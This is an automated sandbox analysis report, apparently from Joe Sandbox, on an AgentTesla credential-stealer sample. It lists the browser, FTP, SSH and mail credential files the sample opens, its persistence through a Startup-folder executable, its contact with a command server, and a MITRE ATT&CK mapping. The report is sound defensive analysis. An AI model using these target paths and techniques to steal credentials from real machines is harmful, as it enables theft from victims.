                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeQueries volume information: C:\Users\user\Desktop\NKPhba0VZI.exe VolumeInformation
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 00000001.00000003.199780118.0000000001408000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.473641028.0000000002DF1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.296957145.0000000003B39000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000003.285607498.0000000000D75000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.209833769.0000000004059000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.474695925.0000000002C41000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.463182723.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.463217997.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: NKPhba0VZI.exe PID: 6112, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Drivers.exe PID: 6520, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: NKPhba0VZI.exe PID: 6064, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Drivers.exe PID: 6980, type: MEMORY
                      Source: Yara matchFile source: 5.2.NKPhba0VZI.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.Drivers.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Drivers.exe.3ca23b8.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Drivers.exe.3c05d70.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.NKPhba0VZI.exe.4125d70.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Drivers.exe.3b9f940.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Drivers.exe.3ca23b8.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.NKPhba0VZI.exe.41c23b8.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.NKPhba0VZI.exe.41c23b8.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.NKPhba0VZI.exe.40bf940.4.raw.unpack, type: UNPACKEDPE
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Tries to harvest and steal browser information (history, passwords, etc)Show sources
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Tries to harvest and steal ftp login credentialsShow sources
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                      Tries to steal Mail credentials (via file access)Show sources
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: Yara matchFile source: 00000014.00000002.473641028.0000000002DF1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.474695925.0000000002C41000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: NKPhba0VZI.exe PID: 6064, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Drivers.exe PID: 6980, type: MEMORY

                      Remote Access Functionality:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 00000001.00000003.199780118.0000000001408000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.473641028.0000000002DF1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.296957145.0000000003B39000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000003.285607498.0000000000D75000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.209833769.0000000004059000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.474695925.0000000002C41000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.463182723.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.463217997.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: NKPhba0VZI.exe PID: 6112, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Drivers.exe PID: 6520, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: NKPhba0VZI.exe PID: 6064, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Drivers.exe PID: 6980, type: MEMORY
                      Source: Yara matchFile source: 5.2.NKPhba0VZI.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.Drivers.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Drivers.exe.3ca23b8.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Drivers.exe.3c05d70.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.NKPhba0VZI.exe.4125d70.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Drivers.exe.3b9f940.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Drivers.exe.3ca23b8.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.NKPhba0VZI.exe.41c23b8.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.NKPhba0VZI.exe.41c23b8.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.NKPhba0VZI.exe.40bf940.4.raw.unpack, type: UNPACKEDPE

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation211Startup Items1Startup Items1Disable or Modify Tools1OS Credential Dumping2File and Directory Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsPowerShell2Registry Run Keys / Startup Folder12Process Injection12Deobfuscate/Decode Files or Information1Input Capture1System Information Discovery114Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Registry Run Keys / Startup Folder12Obfuscated Files or Information2Credentials in Registry1Query Registry1SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing3NTDSSecurity Software Discovery211Distributed Component Object ModelInput Capture1Scheduled TransferApplication Layer Protocol11SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptMasquerading1LSA SecretsVirtualization/Sandbox Evasion13SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion13Cached Domain CredentialsProcess Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection12DCSyncApplication Window Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 358333 Sample: NKPhba0VZI.exe Startdate: 25/02/2021 Architecture: WINDOWS Score: 100 35 nobettwo.xyz 2->35 39 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->39 41 Found malware configuration 2->41 43 Multi AV Scanner detection for dropped file 2->43 45 8 other signatures 2->45 8 NKPhba0VZI.exe 3 2->8         started        12 Drivers.exe 3 2->12         started        signatures3 process4 file5 33 C:\Users\user\AppData\...33KPhba0VZI.exe.log, ASCII 8->33 dropped 47 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 8->47 49 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 8->49 14 NKPhba0VZI.exe 2 8->14         started        18 powershell.exe 15 8->18         started        21 powershell.exe 18 12->21         started        23 Drivers.exe 2 12->23         started        signatures6 process7 dnsIp8 37 nobettwo.xyz 198.54.126.101, 49737, 49738, 587 NAMECHEAP-NETUS United States 14->37 51 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 14->51 53 Tries to steal Mail credentials (via file access) 14->53 55 Tries to harvest and steal ftp login credentials 14->55 57 Tries to harvest and steal browser information (history, passwords, etc) 14->57 29 C:\Users\user\AppData\Roaming\...\Drivers.exe, PE32 18->29 dropped 31 C:\Users\user\...\Drivers.exe:Zone.Identifier, ASCII 18->31 dropped 59 Drops PE files to the startup folder 18->59 61 Powershell drops PE file 18->61 25 conhost.exe 18->25         started        27 conhost.exe 21->27         started        file9 signatures10 process11

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      NKPhba0VZI.exe26%ReversingLabsByteCode-MSIL.Packed.Generic
                      NKPhba0VZI.exe100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe26%ReversingLabsByteCode-MSIL.Packed.Generic

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      20.2.Drivers.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                      5.2.NKPhba0VZI.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                      http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                      http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      http://crl.microsoft.co0%Avira URL Cloudsafe
                      https://pNaYvIZ26OfWPs.net0%Avira URL Cloudsafe
                      http://nobettwo.xyz0%Avira URL Cloudsafe
                      https://contoso.com/0%URL Reputationsafe
                      https://contoso.com/0%URL Reputationsafe
                      https://contoso.com/0%URL Reputationsafe
                      https://contoso.com/License0%URL Reputationsafe
                      https://contoso.com/License0%URL Reputationsafe
                      https://contoso.com/License0%URL Reputationsafe
                      https://contoso.com/Icon0%URL Reputationsafe
                      https://contoso.com/Icon0%URL Reputationsafe
                      https://contoso.com/Icon0%URL Reputationsafe
                      http://oVNzXy.com0%Avira URL Cloudsafe
                      https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
                      https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
                      https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
                      https://api.ipify.org%0%URL Reputationsafe
                      https://api.ipify.org%0%URL Reputationsafe
                      https://api.ipify.org%0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      nobettwo.xyz
                      		198.54.126.101
                      		truetrue
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://127.0.0.1:HTTP/1.1NKPhba0VZI.exe, 00000005.00000002.474695925.0000000002C41000.00000004.00000001.sdmp, Drivers.exe, 00000014.00000002.473641028.0000000002DF1000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		low
                        http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.272085164.0000000005593000.00000004.00000001.sdmp, powershell.exe, 0000000F.00000002.376382490.0000000005CE5000.00000004.00000001.sdmpfalse
                          		high
                          http://DynDns.comDynDNSDrivers.exe, 00000014.00000002.473641028.0000000002DF1000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
